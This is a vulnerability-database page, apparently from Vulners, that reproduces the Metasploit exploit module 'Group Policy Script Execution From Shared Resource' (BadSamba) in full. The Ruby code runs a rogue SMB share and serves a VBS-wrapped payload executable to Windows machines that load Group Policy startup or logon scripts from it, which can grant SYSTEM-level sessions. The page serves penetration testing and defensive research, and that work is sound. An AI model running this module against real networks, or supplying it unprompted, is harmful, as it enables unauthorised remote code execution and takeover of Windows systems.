Vulners
Lucene search
Group Policy Script Execution From Shared Resource
🗓️ 10 Apr 2015 18:01:50Reported by Sam Bertram <[email protected]>, juan vazquez <[email protected]>Type 
metasploit🔗 www.rapid7.com👁 28 Views
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ManualRanking
include Msf::Exploit::Remote::SMB::Server::Share
def initialize(info={})
super(update_info(info,
'Name' => 'Group Policy Script Execution From Shared Resource',
'Description' => %q{
This is a general-purpose module for exploiting systems with Windows Group Policy
configured to load VBS startup/logon scripts from remote locations. This module runs
a SMB shared resource that will provide a payload through a VBS file. Startup scripts
will be executed with SYSTEM privileges, while logon scripts will be executed with the
user privileges. Have into account which the attacker still needs to redirect the
target traffic to the fake SMB share to exploit it successfully. Please note in some
cases, it will take 5 to 10 minutes to receive a session.
},
'Author' =>
[
'Sam Bertram <sbertram[at]gdssecurity.com>', # BadSamba
'juan vazquez' # msf module
],
'References' =>
[
['URL', 'http://blog.gdssecurity.com/labs/2015/1/26/badsamba-exploiting-windows-startup-scripts-using-a-maliciou.html'],
['URL', 'https://github.com/GDSSecurity/BadSamba']
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Privileged' => false,
'Platform' => 'win',
'Arch' => [ARCH_X86, ARCH_X64],
'Payload' =>
{
'Space' => 2048,
'DisableNops' => true
},
'Targets' =>
[
[ 'Windows x86', { 'Arch' => ARCH_X86 } ],
[ 'Windows x64', { 'Arch' => ARCH_X64 } ]
],
'DefaultTarget' => 0,
'DisclosureDate' => '2015-01-26',
'Notes' =>
{
'AKA' => ['badsamba']
}
))
register_options(
[
OptString.new('FILE_NAME', [ false, 'VBS File name to share (Default: random .vbs)'])
])
deregister_options('FILE_CONTENTS')
end
def setup
super
self.file_name = datastore['FILE_NAME'] || "#{Rex::Text.rand_text_alpha(4 + rand(3))}.vbs"
@custom_payloads = {}
print_status("File available on #{unc}...")
end
def on_client_connect(client)
super(client)
unless @custom_payloads[:client]
p = regenerate_payload(client)
exe = p.encoded_exe
@custom_payloads[client] = Msf::Util::EXE.to_exe_vbs(exe)
end
end
def get_file_contents(client:)
contents = @custom_payloads[client] || super(client: client)
contents
end
end
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
02 Oct 2020 20:00Current
6.9Medium risk
Vulners AI Score6.9